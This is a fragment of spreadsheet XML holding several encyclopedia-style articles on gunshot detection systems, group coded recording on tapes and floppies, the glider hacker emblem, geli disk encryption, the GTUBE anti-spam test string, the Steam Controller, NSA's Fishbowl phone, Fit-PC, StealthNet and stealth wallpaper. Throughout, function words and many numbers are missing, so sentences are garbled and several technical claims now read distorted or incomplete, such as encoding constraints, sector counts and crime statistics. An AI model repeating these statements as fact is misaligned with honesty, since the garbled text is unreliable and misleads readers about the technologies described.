microphone/sensor specify within millisecond detected impulse. using information, possible discriminate gunfire normal community noises placing acoustic sensors wide distances extremely loud sounds (i.e., gunfire) reach several sensors. infrared detection systems similar advantage night sensor contend solar contributions background signal. night, signature gunshot partially hidden within background solar infrared contributions. most flash suppressors designed minimize visible signature gunfire. flash suppressors break expanding gases focused cones, thereby minimizing blossoming effect exploding gasses. these focused cones contain signature smaller volume. added signal strength helps increase detection range. because optical flash muzzle blast muffled flash suppressors muzzle blast suppressors (also known “silencers”), efficacy gunshot detection systems reduced suppressed weapons. estimates fewer crimes involve gunfire committed suppressed guns. design sensing method gunshot location systems generally require sensing modalities detect either fact weapon fired detect projectile fired weapon. date, sound, vibration visual infrared light successfully used sensing technologies. both applications implemented detect gunfire static dynamic conditions. most police-related systems permanently mounted, mapped correlated sensors remain place long periods. military swat actions, hand, operate dynamic environments requiring fast setup time capability operate sensors move. acoustic acoustic systems "listen" either bullet shockwave (the sound either projectile bullet passes air), sound muzzle blast weapon fires projectile, combination both. ability sense great distances, sense line-of-sight manner, relatively bandwidth required transmitting sensor telemetry data, systems deployed enforcement, public safety homeland security united states primarily based acoustic techniques. acoustic-only based systems typically generate alerts seconds slower optical sensing systems rely propagation sound waves. therefore, sound reaching sensor mile origin take almost seconds. seconds accommodate pickup distant sensors discern number rounds fired, often indicator incident severity, tolerable drastic improvement typical police dispatching scenarios compared several minutes elapse actual discharge occurs cumulative time several minutes pass person decides place 9-1-1 call information captured, processed, dispatched patrol officers. because systems arrays highly sensitive microphones continuously active, concerns privacy broad ability record conversations without knowledge recorded (this "collateral eavesdropping", capturing conversations inadvertent capability system's design, enforcement agencies stated recording happens shots detected.) optical optical electro-optical systems detect either physical phenomenon muzzle flash bullet fired heat caused friction bullet moves air. such systems require line sight area weapon fired projectile motion. although general line sight shot event required, detections sometimes available infrared flash event bounces surrounding structures. just like acoustic-based systems, electro-optical systems generally degraded specialized suppression devices minimize sound optical signatures. optical electro-optical systems seen success military environments immediacy response critical generally need careful location registration generally case permanently installed "civil" crime fighting systems. just acoustic systems require microphone locate gunshots, electro-optical systems require sensor covering degrees. acoustic optical sensors co-located data fused thereby enabling gunshot location processing exact discharge time used calculate distance discharge sensors greatest possible precision. optical systems (essentially) limited number individual shots fired number different shooters shooting simultaneously, allowing optical-based sensing easily declare locate shooters conducting ambushes employ multiple shooters, shooting multiple locations time period. combination approaches (acoustic infrared) assists overcoming system's limitations improving overall capability eliminate false declarations gunshots and/or ambiguous declaration locations. even combined systems employed, shots fired enough away detected amount gunshot signal (both acoustic infrared) eventually fades background signals. acoustic systems require supersonic shock wave location determination, bullet must still traveling supersonic speed passes sensor, must pass sensor within lateral span shock wave. infrared sensing flash upon weapon's discharge, bullet path determined. combining approaches improves capability various conditions anticipated combat scenario. both optical acoustic sensors used vehicles move urban rural environments. these sensors tested airborne waterborne platforms well. electro-optical detection systems currently tested (2011) process incoming shot signatures fast speeds, providing excellent method discriminate weapon firings non-gunshot events also identify categories, characteristics, sometimes specific weapon types automatically. discriminating gunfire many techniques used discriminate gunfire (also referred “classifying gunfire”) similar noises cars backfiring, fireworks, sound helicopter passing overhead. analysis spectral content sound, envelope, heuristics also commonly used methods classify whether loud, sudden sounds gunfire. identifying source sounds subjective, companies shotspotter revise records based upon information receive police agencies, sound originally classified automated system beat helicopter rotors reported first three, four, finally sound five separate gunshots. result, technology rejected court cases non-scientific purpose legal evidence. meant investigative tool rather source primary legal evidence.another method classifying gunfire uses "temporal pattern recognition," referred developer, employs artificial neural networks trained listen sound signature acoustic events. like acoustic sensing systems, fundamentally based physics acoustics, analyze physical acoustic data using neural network. information network coded terms variation sequence all-or-none (spike) events, temporal patterns, transmitted artificial "neurons". identifying nonlinear input/output properties neurons involved forming memories patterns developing mathematical models nonlinear properties enable identification specific types sounds. these neural networks trained "recognizers" target sound, like gunshot, even presence high noise. regardless methods used isolate gunfire impulsive sounds infrared sensing, standard triangulation methods used locate source gunshot recognized gunshot. optical discriminating previously consisted methods, among spatial, spectral, creative temporal filters, eliminate solar glint false alarm. earlier sensors could operate speeds fast enough allow incorporation matched temporal filters eliminate solar glint false alarm contributor. architectures different system architectures different capabilities used specific applications. general architectures: stand-alone systems local microphone arrays, distributed sensor arrays (“wide-area acoustic surveillance”). former generally used immediate detection alerting nearby shooter vicinity system; uses typically used help protect soldiers, military vehicles craft, also protect small open-space areas (e.g., parking lot, park). latter used protecting large areas cities, municipalities, critical infrastructure, transportation hubs, military operating bases. most stand-alone systems designed military goal immediately alerting human targets take evasive and/or neutralization action. such systems generally consist small array microphones separated precise small distance. each microphone hears sounds gunfire minute differences time, allowing system calculate range bearing origin gunfire relative system. military systems generally rely muzzle blast projectile shockwave “snap” sounds validate classification gunfire calculate range origin. distributed sensor arrays distinct advantage stand-alone systems successfully classify gunfire without hearing projectile “snap” sound, even amid heavy background noise echoes. such systems accepted norm urban public safety allow enforcement agencies hear gunfire discharges across broad urban landscape many square miles. addition urban cityscapes, distributed-array approach intended area protection applications, critical infrastructure, transportation hubs, campuses. using common data-networking methods, alerts discharges conveyed dispatch centers, commanders, field-based personnel, allowing make immediate assessment severity initiate appropriate decisive force response. some systems capability capturing conveying audio clips discharges alert information provides additional invaluable information regarding situation severity. similarly protection critical infrastructure, information clearly unambiguously conveyed real-time regional crisis command control centers, enabling security personnel often inaccurate delayed reports react immediately thwart attacks minimize subsequent activity. applications gunshot location systems used public safety agencies well military/defense agencies. they used primarily dispatch centers rapid reaction gunfire incidents. military/defense, variously known counter-sniper systems, weapons detection location systems, similar terms. uses include alerting potential human targets take evasive action, direct force response neutralize threats, including automated weapon cuing. addition using gunshot location systems convey incident alerts, also relay alert data video surveillance systems real-time, enabling automatically slew cameras scene incident. real-time incident location data makes video surveillance smart; cameras slewed scene, information viewed assess situation plan necessary response; combined audio video information tagged stored subsequent forensic evidence. infrared-based detection systems detect ordnance blast signatures also large caliber weapons mortars, artillery, rocket-propelled munitions, machine guns well small arms. these systems also detect bomb impact explosions, thereby locating impacts indirect fire weapons like artillery mortars. detector used automated shot correction sensor close arms support. public safety public safety enforcement, gunshot location systems often used high-crime areas rapid alerts awareness communications dispatch center alerts used direct first responders scene gunfire, thus increasing arrest rates, improving officer safety, securing witnesses evidence, enhancing investigations, well long deterring crimes, shootings especially "celebratory gunfire" (the practice shooting weapons fun). gunshot location systems based upon wide-area acoustic surveillance coupled persistent incident data storage transcends dispatch-only uses reporting urban gunfire (via calls 9-1-1) 25%, means enforcement agencies crime analysts incomplete data regarding true activity levels patterns. with wide-area acoustic-surveillance-based approach combined persistent repository gunfire activity (i.e., database), agencies closer 100% activity data analyzed patterns trends drive directed patrols intelligence-led policing. additional benefits include aiding investigators find forensic evidence solve crimes provide prosecutors strengthen court cases resulting higher conviction rate. with accuracy gunshot location system ability geo-reference specific street address, versus dearth information typically case citizens report gunfire incidents 9-1-1, agencies also infer shooters comparing known criminal locations, including parole probation; investigators also times infer intended victims hence predict prevent reprisals. gunshot location systems used domestically urban areas since mid-1990s growing list cities municipalities embracing gunshot location systems mission-essential tool arsenal fighting violent crime. federal homeland security agencies embraced gunshot location systems benefits; notably successfully used shotspotter gunshot location system 2003–2004 ohio highway sniper attacks, conjunction franklin county sheriff. technology tested redwood village, neighborhood redwood city, april 1996. through 2007, manufacturer touted device benefits, local officials split effectiveness. effective reducing random gunfire. surveys conducted showed effective "perception" action. shotspotter system installed washington, successfully relied upon locate gunfire area coverage. washington, police department reported 2008 helped locate victims violent crime aided arrests. addition assaults, system detected large amount "random" gunfire, totaling gunshots week 2007. based system's success, police department decided expand program cover nearly quarter city.as 2016, detection systems deployed number cities, including baltimore, maryland bellwood, illinois; birmingham, alabama; boston; canton, ohio; cambridge, massachusetts; chicago; hartford; kansas city; angeles; milwaukee; minneapolis; bedford, massachusetts; oakland; omaha; francisco; springfield, massachusetts; washington, d.c.; wilmington, north carolina; york city; integration cameras point direction gunfire detected also implemented. 2014, utility sites systems. antonio, texas discontinued $500,000 shotspotter service, finding resulted four arrests.in august 2017, united states secret service began testing gunshot detection technology protect white house united states naval observatory. military defense determination origin gunfire sound conceived world first used operationally. early sound-based systems used primarily large weapons. weapons detection location systems counter-sniper systems deployed department defense well militaries countries.acoustic threat-detection systems include unattended transient acoustic masint sensor (utams), serenity payload firefly, developed army research laboratory. wildlife poaching south africa's kruger national park, gunfire locators used prevent rhino poaching. open gunshot detectors soter gunshot locator project community effort uses open source hardware, cloud technology, machine learning, printing build inexpensive gunshot detectors capable locating classifying gunfire urban, public, school spaces within seconds. fish bombing stop fish bombing usa, project fiscal sponsorship earth island institute, adapted shotspotter technology hydrophones combat fish bombing coral reefs sabah, malaysia. also boomerang (countermeasure) gunfire locator darpa counter-sniper tactics counter-insurgency notes external links "from acoustic detection data fusion" "creating ‘fire alarm’ terror attacks", wall street journal, november 2015. location acoustic sources using seismological techniques software, usgs open-file report 93-221 earthquake technology fights crime, usgs fact sheet-096-96 barrie, allison march 2017). "incredible tech detects gunfire across america". news.</t>
  </si>
  <si>
    <t>Group coded recording</t>
  </si>
  <si>
    <t>computer science, group coded recording group code recording (gcr) refers several distinct related encoding methods representing data magnetic media. first, used 6250 magnetic tape since 1973, error-correcting code combined length limited (rll) encoding scheme, belonging group modulation codes. others different mainframe hard disk well floppy disk encoding methods used microcomputers late 1980s. modified form nrzi code, necessarily higher transition density. magnetic tape group coded recording first used magnetic tape data storage 9-track reel-to-reel tape. term coined development 3420 model 4/6/8 magnetic tape unit corresponding 3803 model tape control unit, introduced 1973. referred error correcting code "group coded recording". however, come refer recording format 6250 (250 bits/mm) tape whole, later formats similar codes without error correction code. order reliably read write magnetic tape, several constraints signal written must followed. first adjacent flux reversals must separated certain distance media, defined magnetic properties media itself. second must reversal often enough keep reader's clock phase written signal; signal must self-clocking importantly keep playback output high enough proportional density flux transitions. prior 6250 tapes, 1600 tapes satisfied constraints using technique called phase encoding (pe), efficient. 6250 tapes, code used, specifically block code sometimes also referred (4b-5b) encoding. this code requires five bits written every four bits data. code structured zero bits (which represented lack flux reversal) occur row, either within code codes, matter data was. this code applied independently data going nine tracks. five-bit patterns, eight begin consecutive zero bits, others consecutive zero bits, (10001) contains three consecutive zero bits. removing all-ones pattern (11111) remainder leaves suitable code words. 6250 code: nibbles (other xx00 0001) code formed prepending complement significant bit; i.e. abcd encoded aabcd. five values assigned codes beginning nibbles form ab00 codes 11baa, i.e. reverse code ab11. code 0001 assigned remaining value 11011. because back extremely high density 6250 tape, code sufficient ensure reliable data storage. code, error-correcting code called optimal rectangular code (orc) applied. this code combination parity track polynomial code similar crc, structured error correction rather error detection. every seven bytes written tape (before encoding), eighth check byte calculated written tape. when reading, parity calculated byte exclusive-ored contents parity track, polynomial check code calculated exclusive-ored received check code, resulting 8-bit syndrome words. zero, data error free. otherwise, error-correction logic tape controller corrects data forwarded host. error correcting code able correct number errors single track, tracks erroneous tracks identified means. newer half-inch 18-track tape drives recording 24000 bpi, replaced efficient modulation code, mapping eight bits nine bits. hard disks 1970s, sperry univac, division working large hard drives mainframe business using group coding. floppy disks like magnetic tape drives, floppy disk drives physical limits spacing flux reversals (also called transitions, represented one-bits). micropolis offering gcr-compatible diskette drives floppy disk controllers (like 100163-51-8 100163-52-6), micropolis endorsed data encoding group coded recording 5¼-inch 77-track diskette drives store twelve 512-byte sectors track since 1977 1978. micro peripherals micro peripherals, inc. (mpi) marketed double-density 5¼-inch disk drives (like single-sided double-sided drives) controller solution implementing since early 1978. durango durango systems f-85 (introduced september 1978) used single-sided 5¼-inch diskette drives providing utilizing proprietary high-density group coded encoding. machine using western digital fd1781 floppy disk controller, designed former sperry engineer, 77-track micropolis drives. later models durango series expanded double-sided option (946 formatted) diskette. apple apple floppy drive, steve wozniak invented floppy controller (along disk drive itself) imposed constraints: between bits, maximum zero bit. each 8-bit byte must start bit.the simplest scheme ensure compliance limits record extra "clock" transition data according differential manchester encoding (digital) (frequency modulation). known 4-and-4 encoding, resulting apple implementation allowed 256-byte sectors track recorded single-density 5¼-inch floppy. uses bytes byte. close month prior shipment disk drive spring 1978, wozniak realized complex encoding scheme would allow eight-bit byte disk hold five bits useful data rather four bits. this bytes zero bits row. this encoding scheme became known 5-and-3 encoding, allowed sectors track; used apple 3.1, 3.2, 3.2.1, well earliest version apple cp/m: reserved gcr-codes: 0xaa 0xd5.wozniak called system incredible experience apple finest did".later, design floppy drive controller modified allow byte disk contain pair zero bits row. this allowed eight-bit byte hold bits useful data, allowed sectors track. this scheme known 6-and-2 encoding, used apple pascal, apple prodos, later apple fileware drives apple lisa 400k 800k 3½-inch disks macintosh apple apple originally call scheme "gcr", term later applied distinguish floppies used encoding scheme. reserved gcr-codes: 0xaa 0xd5. commodore independently, commodore business machines (cbm) created group coded recording scheme commodore 2040 floppy disk drive (launched spring 1979). relevant constraints 2040 drive zero bits could occur row; drive imposed special constraint first byte. this allowed scheme similar used 6250 tape drives. every four bits data translated five bits disk, according following table: each code starts ends zero bit, ensuring even codes concatenated, encoded data never contain zero bits row. with encoding eight bits possible. therefore, commodore used sequences bits synchronization mark. this efficient scheme, combined approach constant bit-density recording gradually increasing clock rate (zone constant angular velocity, zcav) storing physical sectors outer tracks inner ones (zone recording, zbr), enabled commodore standard single-sided single-density 5.25-inch floppy, apple (with 6-and-2 encoding) (with 5-and-3 encoding) fm-encoded floppy held sirius/victor similar, 5.25-inch floppy drives victor 9000 sirius designed chuck peddle 1981/1982, used combination ten-bit constant bit-density recording gradually decreasing drive's rotational speed outer tracks nine zones form zoned constant linear velocity (zclv)) increasing number sectors track variant zone recording (zbr)) achieve formatted capacities (single sided) 1188 (double-sided) media. brother starting around 1985, brother introduced family dedicated word processor typewriters integrated 3.5-inch 38-track diskette drive. early models series used brother-specific group-coded recording scheme twelve 256-byte sectors store single-sided double-sided double-density (dd) diskettes. reportedly, prototypes already shown internationale funkausstellung 1979 (ifa) berlin. sharp 1986, sharp introduced turnable 2.5-inch pocket disk drive solution (drives: ce-1600f, ce-140f; internally based fdu-250 chassis; media: ce-1650f) series pocket computers formatted capacity 62464 bytes side nominal, tracks, sectors/track, bytes sector, tpi, kbit/s, rpm) (4/5) recording. other uses also evaluated possible code encoding schemes (packing efficiency, timing tolerances, amount storage bytes timing information, output level). also modified frequency modulation (mfm) length limited (rll) eight-to-fourteen modulation (efm) error-correcting code 8b/10b encoding group code 4b5b integrated machine (iwm, disk controller apple computers) paula (mos technology 8364, gcr-capable disk controller commodore amiga computers) individual computers catweasel special diskette controller able read formats) kryoflux special diskette controller able read formats) notes references further reading ansi incits 40-1993 (r2003) unrecorded magnetic tape information interchange track, bpi, nrzi; 1600 bpi, 6250 bpi, gcr) ansi incits 54-1986 (r2002) recorded magnetic tape information interchange (6250 bpi, gcr) sallet, herbert (july 1977). "magnetic tape: high performer: magnetic tape evolved highly effective medium high-density low-cost-per-bit data recording". ieee spectrum. (7): 26–31. doi:10.1109/mspec.1977.6501525. sidhu, pawitter (december 1976). "group-coded recording reliably doubles diskette capacity". computer design: 84–88. "(unknown)". perkin-elmer data systems news. perkin-elmer data systems. 1977-06-14. {{cite journal}}: cite uses generic title (help) hsiao, (ben) carter, william thomas, james stringfellow, william (september 1981). "reliability, availability, serviceability computer systems". journal research development. (5): 462. doi:10.1147/rd.255.0453. (nb. mentions code used 6250 tape drives.) qualstar 34xx technical service manual (pdf) (revision ed.). canoga park, usa: qualstar corporation. 3-4..3-7. 500450. archived original (pdf) 2011-09-30. retrieved 2017-03-23. (nb. additional detail tape format.) 3685033, agrawala, ashok srivastava, keshava, "block encoding magnetic recording systems", published 1972-08-15, assigned honeywell inc. (nb. application 66199. also: ca993998a, ca993998a1, de2142428a1) 4210959, wozniak, stephen "controller magnetic disc, recorder, like", published 1980-07-01, assigned apple computer, inc. (nb. application number: 5/904420) 4564941, woolley, richard glover, neal williams, richard, "error detection system", published 1986-01-14, assigned apple computer, inc. (nb. application number: 06/559210. also: ca1208794a, ca1208794a1, de3443272a1, de3443272c2) dockery, sean brendan. "apple disk encoding". µpd72070 floppy disk controller specification version (pdf). preliminary. corporation. october 1991. archived original (pdf) 2017-03-20. retrieved 2017-03-20. åkesson, linus (2013-03-31). "gcr decoding fly". archived original 2017-03-21. retrieved 2017-03-21. trikaliotis, spiro (2010-03-05). "commodore "mysteries"". archived original 2014-08-05. "gcr en-/decoder commodore 8050 8250 disk drives". forum archived original 2010-03-12. irwin, john cassie, john oppeboen, harlyn (september 1971) [1970-12-11]. "the 3803/3420 magnetic tape subsystem". journal research development. ibm: 391–400. citeseerx 10.1.1.89.7834. docket (june 2014). "milestone-proposal:introduction apple macintosh computer, 1984". archived original 2018-07-09. retrieved 2018-07-09. "crazy disk encoding schemes". mess wires (bmow) plus too. 2011-10-02. archived original 2018-07-09. retrieved 2018-07-09. dickreiter, michael; dittel, volker; hoeg, wolfgang; wöhr, martin (2014). handbuch tonstudiotechnik german). walter gruyter gmbh isbn 978-3-11031650-6. isbn 3-11031650-1. retrieved 2018-07-09. bergmans, (2013-03-09) [1996]. "chapter 4.8.3 group-coded recording (gcr) code". digital baseband transmission recording (reprint ed.). philips research, eindhoven, netherlands: kluwer academic publishers springer science business media. doi:10.1007/978-1-4757-2471-4. isbn 978-1-4419-5164-9. retrieved 2018-07-09. camras, marvin (2012) [1988]. magnetic recording handbook (reprint ed.). nostrand reinhold company springer science business. doi:10.1007/978-94-010-9468-9. isbn 978-9-40109468-9. lccn 86-24762. isbn 9-40109468-3. retrieved 2018-07-09. single-drive setup tape system three densities". computerworld. louisville, colorado, usa: communications/inc. xiii (19): 1979-05-07. retrieved 2018-07-09. external links "les disquettes drive disk french). archived original 2018-07-09. retrieved 2018-07-09., "les nibbles" french). archived original 2017-03-22. retrieved 2018-07-09., methode prodos: rapide efficace" french). archived original 2018-07-09. retrieved 2018-07-09.</t>
  </si>
  <si>
    <t>Hacker Emblem</t>
  </si>
  <si>
    <t>glider pattern travels across board conway's game life. first discovered richard 1969, john conway's group attempting track evolution r-pentomino. gliders smallest spaceships, travel diagonally speed cell every four generations, {\displaystyle c/4} glider often produced randomly generated starting configurations. john conway remarked wished called glider. game developed widespread interactive computers, seeing animated, feels glider looks like walking across plane. importance gliders important game life easily produced, collided form complicated objects, used transmit information long distances. instances second advantage called glider syntheses. instance, eight gliders positioned collide form gosper glider gun. glider collisions designed result certain patterns also called glider syntheses. patterns blocks, beehives, blinkers, traffic lights, even uncommon eater, synthesized gliders. takes three gliders build three basic spaceships, even pentadecathlon oscillator. some patterns require large number (sometimes hundreds) glider collisions; oscillators, exotic spaceships, puffer trains, guns, etc. whether construction exotic pattern gliders possibly mean occur naturally, still conjecture. gliders also collided patterns interesting results. example, gliders shot block right way, block moves closer source gliders. three gliders shot right way, block moves farther away. this "sliding block memory" used simulate counter, would modified firing gliders possible construct logic gates and, using gliders. also build pattern acts like finite state machine connected counters. this computational power universal turing machine, using glider, game life theoretically powerful computer unlimited memory time constraints: turing complete. hacker emblem eric raymond proposed glider emblem represent hacker subculture, game life appeals hackers, concept glider "born almost time internet unix". emblem various places within subculture. references external links glider lifewiki glider: proposal hacker emblem</t>
  </si>
  <si>
    <t>Geli (software)</t>
  </si>
  <si>
    <t>geli block device-layer disk encryption system written freebsd, introduced version 6.0. uses geom disk framework. designed implemented paweł jakub dawidek. design details geli initially written protect data user's computer situations physical theft hardware, disallowing thief access protected data. this changed time introduction optional data authentication/integrity verification.geli allows consist several information components user entered passphrase, random bits file, etc.), permits multiple keys user company key, example) attach provider random, one-time key. user passphrase strengthened pkcs#5. differences gbde geli utility different gbde offers different features uses different scheme cryptographic work. supports crypto framework within freebsd, allowing hardware cryptographic acceleration available, well supporting cryptographic algorithms (currently aes, triple des, blowfish camellia) data authentication/integrity verification md5, sha1, ripemd160, sha256, sha384 sha512 hash message authentication codes. also gbde luks disk encryption disk encryption software comparison disk encryption software references</t>
  </si>
  <si>
    <t>GTUBE</t>
  </si>
  <si>
    <t>gtube ("generic test unsolicited bulk email") 68-byte test string used test anti-spam systems, particular based spamassassin. spamassassin, carries antispam score 1000 default, would sufficient trigger installation. contents contents string follows: xjs*c4jdbqadn1.nsbn3*2idnen*gtube-standard-anti-ube-test-email*c.34x placed message body 5322 compliant email message, without linebreaks whitespaces. checksums string bytes, trailing newline) follows: there exist varieties, notably naitube (which carry variable weight) gtphish (which trigger specifically phishing mail), used mcafee implementation spamassassin. gtube expected detected substring executable all, unlike test computer viruses developed eicar (known eicar test file). also eicar test file similar test virus files references bibliography "spamassassin: gtube". apache software foundation.</t>
  </si>
  <si>
    <t>Steam Controller</t>
  </si>
  <si>
    <t>steam controller game controller developed valve personal computers running steam windows, macos, linux, smartphones steamos. controller designed games developed controller users, also games traditionally played keyboard mouse controls played controller. released november 2015 along valve's steam machine discontinued november 2019. features steam controller features clickable trackpads opposed typical thumbsticks modern console controllers), fourteen buttons, including face, shoulder, undergrip buttons. trackpads include haptic feedback; chris kohler wired described using controller playing civilization valve press event, noted used trackpad move mouse cursor, electromagnets within controller created audio tactile feedback using trackball. although controller designed steam machine platform, also used steam existing pcs. controller also included gyroscopic sensors detect relative orientation controller. controller presently designed used within steam's picture mode; enables player access detailed options setting various features controller per-game basis including button/trackpad mapping sensitivity well accessing users' shared controller configuration themselves. steamworks provides means developers provide detailed settings steam controller picture mode. outside picture mode, controller otherwise behaves standard two-stick controller, though valve plan updating steam allow retaining previously picture mode per-game settings. development original design controller include touchscreen center unit. touchscreen would acted like mousepad allow players perform actions typically capable controllers, operating directly steam steamos overlaying touchscreen display onto players' screens allow manipulation game without diverting attention screen. however, january 2014 steam days event, valve revealed since dropped touchscreen concept controller, rearranged existing face buttons compatible existing games.valve went several iterations controller would able mimic keyboard mouse controls, using prototypes made printing test ergonomics. early versions controller design included trackball embedded controller simulate mouse functionality opted eventually trackpads give customization functionality developers including ability simulate motion trackball tracking finger's motion trackpad. trackpads controller design made minimize amount contact player's thumbs would trackpad holding unit. opposed plans steam machine produced multiple third-parties, valve planned sole producer steam controller; valve's greg coomer stated decision based achieving best implementation controller valve's vision device, noting didn’t think really going possible outsource design manufacturing finishing controller would allow third parties take idea reference design bring market soon enough". valve clarify would open specifications third-party controllers developed (which done publicly march 2016). december 2015, valve working flex robotic assembly line buffalo grove, illinois assemble machines; jokingly, machines given aperture science branding, fictional company valve's portal series, presumably products later discontinuation. updates valve pushed updates aimed increasing user customizability. valve added improvements controller's capabilities based public feedback following launch, including movement aiming controls schemes using internal gyroscope, ability trigger actions enable cursor movement limited certain regions (such manipulate game's mini-map), quick-access popup commands similar hotkeys keyboard-and-mouse games, cloud-based controller configuration saving, support non-steam games otherwise played steam overlay. several updates introduced june 2016. update enabled users create actions using controller switch different configurations fly. this update also enabled ability customize motion-sensing controls used virtual reality games. second update june 2016 enabled buttons 'activators' respond differently based type input button, distinguishing single short tap, extended hold, double-tap, example. these called 'activators' also used simulate constant holding button single press, often used action crouching many first-person third-person shooters.valve afterwards worked supporting similar controller customization features user interfaces compatible controllers, released first update steam software sony's dualshock controller december 2016, beta support controllers including xbox january 2017. support nintendo switch controller added 2018. while controllers used steam basic operating system functionality.on march 2016, valve announced would publicly releasing computer aided design geometry steam controller. geometry released creative commons license.in 2018, valve updated controller enable bluetooth communications, allowing pair mobile devices. this allows controller used alongside steam link replaced steam link hardware. release reception steam controller publicly released november 2015, alongside release steam machines. june 2016, 500,000 sold october, nearly million sold, including controllers bundled steam machines. october 2016, valve disclosed 27,000 controllers "daily active use". september 2018, valve disclosed figures showing approximately million steam controllers connected steam, connected steam within month survey performed. comparison, popular controller used steam xbox controller, around 27.2 million connections connected within month survey.valve announced november 2019 discontinued production controller sold remaining inventory significantly reduced price. ironburg inventions lawsuit lawsuit filed valve ironburg inventions 2020, asserting valve knowingly violated patent inclusion rear-face buttons learning ironburg's patent 2014. jury trial started january 2021. jury found valve willfully infringed ironburg patent awarded ironburg million base damages. references external links official website</t>
  </si>
  <si>
    <t>Fishbowl (secure phone)</t>
  </si>
  <si>
    <t>fishbowl mobile phone architecture developed u.s. national security agency (nsa) provide secure voice (voip) capability using commercial grade products approved communicate classified information. first phase nsa's enterprise mobility architecture. according presentation 2012 conference margaret salter, technical director information assurance directorate, "the plan commercial components, layer together secure solution. uses solely commercial infrastructure protect classified data." government employees reportedly testing phones announcement.the initial version implemented using google's android operating system, modified ensure central control phone's configuration times. minimize chance compromise, phones layers encryption protocols, ipsec secure real-time transport protocol (srtp), employ nsa's suite encryption authentication algorithms. usmobile implemented commercial enterprise version fishbowl technology scrambl3 mobile apps android platforms. phones locked many ways. while commercial wireless channels, communications must sent enterprise-managed server. direct voice calls allowed, except 9-1-1 emergency calls. only approved applications enterprise store installed. published 100-page overview specification mobility capability package. tandem capability package series protection profiles. these protection profiles list requirements commercial product must meet used mobile phone architecture. references</t>
  </si>
  <si>
    <t>Fit-PC</t>
  </si>
  <si>
    <t>fit-pc small, light, fan-less nettop computer manufactured israeli company compulab. many fit-pc models available. fit-pc introduced july 2007, fit-pc slim introduced september 2008, fit-pc introduced 2009, fit-pc introduced early 2012, fit-pc introduced spring 2014. device power-efficient (fit-pc therefore considered green computing project, capable using open source software creating minimal electronic waste. current models fit-pc2 february 2009, compulab announced fit-pc2, major upgrade fit-pc product line". detailed specifications fit-pc2 include intel atom z5xx silverthorne processor (1.1/1.6/2.0 options), ram, 160gb sata hard drive, gigabit more. fit-pc2 also capable video playback. declared power consumption according manufacturer, saves power used standard desktop. fit-pc2 power efficient energy-star list. fit-pc2 based (graphics media accelerator). unfortunately open source driver included linux kernel 2.6.39 support va-api video opengl/3d acceleration. fit-pc2 phased replaced fitlet, fitlet designed replace groundbreaking (and still popular) compulab fit-pc2. fit-pc2i december 2009, compulab announced fit-pc2i, fit-pc2 variation targeting networking industrial applications. fit-pc2i adds second gbit ethernet port, wake-on-lan, s/pdif output rs232 port, fewer ports, fit-pc3 fit-pc3 released early 2012. fit-pc3 article. fit-pc4 fit-pc4 released spring 2014. fitlet fitlet announced january 2015. cpu/soc variations, feature variations, though models announced far. obsolete models fit-pc slim september 2008, compulab announced fit-pc slim, smaller fit-pc 1.0. hardware fit-pc slim uses geode lx800 processor 512mb soldered-on ram. computer includes output, serial port custom connector, ethernet, wlan, ports front panel). system upgradeable 2.5" 60gb hard drive. software fit-pc slim general software bios supporting booting cdrom thumb drive. pre-installed either windows vista ubuntu 8.10 gentoo linux 2008.0 also windows embedded used, pre-installed flowdrive. availability fit-pc slim end-of-life announced june 2009 general availability fit-pc2. fit-pc fit-pc earlier model following differences limited 256mb wi-fi dual 100baset ethernet larger form factor 11.6 only ports hard disk upgradeable power button indicator leds power supply also trim-slice, mini-computer also made compulab industrial media center (disambiguation) media nettop references external links fit-pc website compulab website fit-pc australia website fit-pc2 users forum fit-pc website</t>
  </si>
  <si>
    <t>StealthNet</t>
  </si>
  <si>
    <t>stealthnet anonymous file sharing software based original rshare client, enhanced. first named 'rshare (rshare community edition). network protocols rshare. 2011 fork named darknode release, year later website cleared source code. history development stopped march 2011, version 0.8.7.9, official explanation site.in 2012, developers incident software apache subversion, part source code stealthnet lost versions 0.8.7.5 (february 2010) 0.8.7.9 (october 2010). however source code still available files. features some features stealhnet: network (use pseudo anonymous process) easy (same principles emule) multi-source download 'swarming' (segmented file transfer) resumption interrupted downloads filter file types searched (allowing search among videos/archives/musics/... files) sncollection: type file contain list files shared stealthnet. like "emule collection" file torrents files point-to-point traffic encryption standard process (advanced encryption standard, bits) endpoint endpoint traffic encryption standard (1024 bits) strong file hashes based sha-512 algorithm anti-flooding measures text mode client available monosupport like linux, others drawbacks support upnp (universal plug play), user must open port number (ie: 6097) router. anonymity unproven. source code contains documentation all. encryption level (aes bits 1024 bits v0.8.7.9) strong 2000s medium since 2010s. also anonymous references external links english) official site english) stealthnet upgrade (2017)</t>
  </si>
  <si>
    <t>Stealth wallpaper</t>
  </si>
  <si>
    <t>computer network security, stealth wallpaper material designed prevent indoor wi-fi network extending "leaking" outside building, malicious persons attempt eavesdrop attack network. while simple prevent electronic signals passing building covering interior metal, stealth wallpaper accomplishes difficult task blocking wi-fi signals still allowing cellphone signals pass through. first stealth wallpaper originally designed defense contractor systems 2012, register reported commercial wallpaper developed institut polytechnique grenoble centre technique papier planned sale 2013. this wallpaper blocks three selected wi-fi frequencies. nevertheless, allow signals pass network, therefore allowing cell phone remain unaffected wallpaper. also electromagnetic shielding faraday cage tempest wallpaper wireless security references external links azcom: stealth wallpaper prevents wi-fi signals escaping without blocking mobile phone signals register: wifi blocking wallpaper</t>
  </si>
  <si>
    <t>Stealth Key</t>
  </si>
  <si>
    <t>stealth fully metal printed security key. invented october 2013 alejandro ojeda, cofounded urbanalps switzerland patent 710314 metal printed hides mechanical security features inside rendering virtually unscannable (i.e. except using analysis). complementary cylinder purely mechanical design able read internal bittings key. code matching, user able turn cylinder open lock.history stealth concept originated response important physical security breach: unauthorized duplication printing. with printers scanners reaching consumer market early 2010 copy patent protection security keys made obsolete. many amateur users reported duplicating security keys several companies offering duplication services using smartphone images began commercial operation essence almost object printed. point stealth mechanical code scanned photographed, copied. code concealing secure ways protect additive manufacturing keys unlike ordinary keys produced blank stamping subsequent hole drilling, stealth mechanical made additive manufacturing metal printed). major disruption manufacturing status took full advantage novel manufacturing process, i.e. complex internal features batch size (each single printed batch unique). references</t>
  </si>
  <si>
    <t>Flatpak</t>
  </si>
  <si>
